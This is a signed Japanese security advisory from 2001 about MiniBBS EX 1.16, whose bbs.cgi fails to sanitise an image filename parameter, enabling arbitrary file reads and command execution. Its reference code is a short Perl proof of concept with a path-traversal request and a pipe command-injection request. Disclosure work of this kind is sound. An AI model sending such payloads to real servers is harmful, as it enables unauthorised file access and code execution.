-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

======================================================================
CGI PROGRAM SECURITY ADVISORY  [MiniBBS EX 1.16]            2001/01/20
======================================================================
http://www.ansi.co.jp/cgi/security/advisories/minibbs-ex_2000_01_20.txt
======================================================================

■ 影響を受けるCGIプログラム

* 簡易BBSエクセレント 1.16

■ 概要

簡易BBSエクセレント 1.16 はレスキュー (Rescue) 氏によって作成された掲
示板CGIプログラムです。このプログラムには外部から任意のファイル (CGI
プログラムが実行される UID で読み取り可能なもの) を読み取り可能・任意
のコマンドが実行可能なセキュリティ上の問題点があります。

簡易BBSエクセレント: http://www.rescue.ne.jp/cgi/minibbs-ex/

■ 解説

簡易BBSエクセレント 1.16 に含まれる bbs.cgi では、外部から与えられる画
像ファイル名の汚染チェックを怠っているため、外部から CGI プログラムの
実行権限で読み取れる全てのファイルの読み取り・任意のコマンドの実行が可
能です。任意のコマンドが実行可能なため、任意のファイルに対する書き込み
も可能です。

■ 影響

CGIプログラムが各ユーザ権限で実行されるシステム (Apache + SuEXEC など)
の場合、そのユーザの権限で任意の操作をすることが可能です。これによって
ユーザ環境が破壊される可能性があります。そうではない場合でも、CGI プロ
グラムの実行 UID で任意の操作が可能です。

■ 回避方法

新しいバージョンのプログラムを入手して入れ替えます。

■ 参考コード

#! /usr/bin/perl -w

use LWP::Simple;

getprint "http://host/minibbs-ex-1.16/bbs.cgi?img=../../path/to/file";
getprint "http://host/minibbs-ex-1.16/bbs.cgi?img=|+ls+-lR+>+/tmp/ls-lR+|";

__END__

■ 変更履歴

2001/01/20: 公開
2001/02/03: 参考コードを追加

======================================================================

(C) 2001 ASUKA NETWORK SERVICE, INC.  http://www.ansi.co.jp/
         HIRATA YASUYUKI              http://yasu.asuka.net/
All rights reserved.

* この文書に書かれている内容は無保証です
* この文書に書かれている内容を利用して攻撃を行った場合、刑事上・民事上
  の責任を問われることがあります。
* このファイルは内容の変更 (電子署名の除去を含む) が行われない限り自由
  に再配布可能です。

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (FreeBSD)
Comment: For info see http://www.gnupg.org

iD8DBQE7rqeGduP2KhBu8ikRAqqRAJ9qGOtmGlVtIkqtG6HQAleinmehhQCeIMIO
9LKB996J/AmEe6728qIwru+IPwMFATuup4bCitaZXxzdBBECqpEAn1BWM7lw4tHm
V9p0o0yds/bjYE+eAKCrhRIZmSFhE+mBMgxMT/vpDXAf7Q==
=916l
-----END PGP SIGNATURE-----